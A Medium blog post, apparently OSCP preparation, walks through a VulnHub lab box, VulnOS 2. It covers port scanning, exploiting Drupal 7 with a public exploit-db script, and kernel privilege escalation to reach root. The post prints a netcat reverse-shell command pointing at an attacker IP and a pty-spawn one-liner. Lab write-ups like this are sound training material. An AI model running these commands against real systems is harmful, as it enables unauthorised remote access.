Open in app

Sign in

Write

Sign in

OSCP Prep: Beating VulnOS: 2

Samyakt Jain
3 min readOct 27, 2023

In this writeup, I’m going to share my journey in solving the VulnOS2 machine from the VulnHub platform. VulnHub is a hub of virtual challenges for cybersecurity enthusiasts. Much like TryHackMe, it’s a fantastic place to hone your skills and enjoy the thrill of Capture The Flags (CTF). let’s dive into my VulnOS2 adventure.

Enumeration

To begin, use nmap to scan and locate an open port.

port 22,80,667 is open, Lets first check port 80

Let’s hit http://10.0.2.12:80/ and find that “### Pentest the company website on the server… Get the root of the system and read the final flag ###”

We need to conduct a penetration test on the website located at http://10.0.2.12/jabc/ to gain root access and discover the flag.

First, let’s examine the technologies in use on the website using wapalyzer extension.

Here website is running on Drupal7.

Exploiting Drupal 7

Now we are moving to find an exploit for Drupal 7, So we are using searchsploit.

I have found multiple exploits but don’t know why the above is not working properly, So I have just googled Drupal 7 exploit and found this exploit https://www.exploit-db.com/exploits/44449.

After running the above exploit and got the shell.

First start to take tty shell and get the root for this we are using this reverse shell “nc -e /bin/sh 10.0.2.4 1234” and after using this command for tty “python -c ‘import pty; pty.spawn(“/bin/bash”)

After getting the tty shell.

Privilege Escalation

Once we’re inside the target’s shell, the first thing to do is find out which distribution and kernel it’s running.

We’re using Ubuntu 14.04.4, and the kernel version is 3.13.0–24-generic. We’ll use Trusty SearchSploit to find a simple way to get root access.

Discovered the following exploit and successfully moved it into the target machine using a Python server

After applying this exploit, we now have full root access.

We have one last task at hand: locating the flag. It’s usually situated in the /root directory, so let’s go there and see what we can discover.

The challenge wraps up here. We want to express our gratitude for your time in reading this write-up

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Oscp Preparation
Vulnhub
Ctf Writeup
Oscp Vulnhub

Samyakt Jain
Samyakt Jain

Written by Samyakt Jain

14 Followers
36 Following

OSCP+, CEH. https://www.linkedin.com/in/samyakt-jain-a44754168/

No responses yet

Write a response

What are your thoughts?

More from Samyakt Jain

See all from Samyakt Jain

Recommended from Medium

Lists

Staff picks

827 stories1648 saves

Stories to Help You Level-Up at Work

19 stories948 saves

Self-Improvement 101

20 stories3355 saves

Productivity 101

20 stories2818 saves
See more recommendations

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams